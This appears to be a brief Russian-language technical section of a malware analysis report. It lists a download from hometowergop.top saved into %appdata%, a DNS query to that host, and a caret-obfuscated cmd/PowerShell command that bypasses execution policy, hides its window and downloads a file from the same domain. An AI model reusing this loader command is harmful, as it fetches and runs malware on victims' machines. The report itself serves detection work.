Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^WE^RSHel^l.e^Xe -EX^ECuTI^OnPOL^ICy^ ^bYPaSS ^-noP^R^o^Fil^e ^-wInd^OwST^ylE^ HI^D^DEN ^(NEw^-O^BJe^Ct sy^stE^M.NET.weBClIent).dOwN^l^oadfI^L^E^(^'http://hometowergop.top/...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /C "pO^WE^RSHel^l.e^Xe -EX^ECuTI^OnPOL^ICy^ ^bYPaSS ^-noP^R^o^Fil^e ^-wInd^OwST^ylE^ HI^D^DEN ^(NEw^-O^BJe^Ct sy^stE^M.NET.weBClIent).dOwN^l^oadfI^L^E^(^'http://hometowergop.top/...' (со скрытым окном)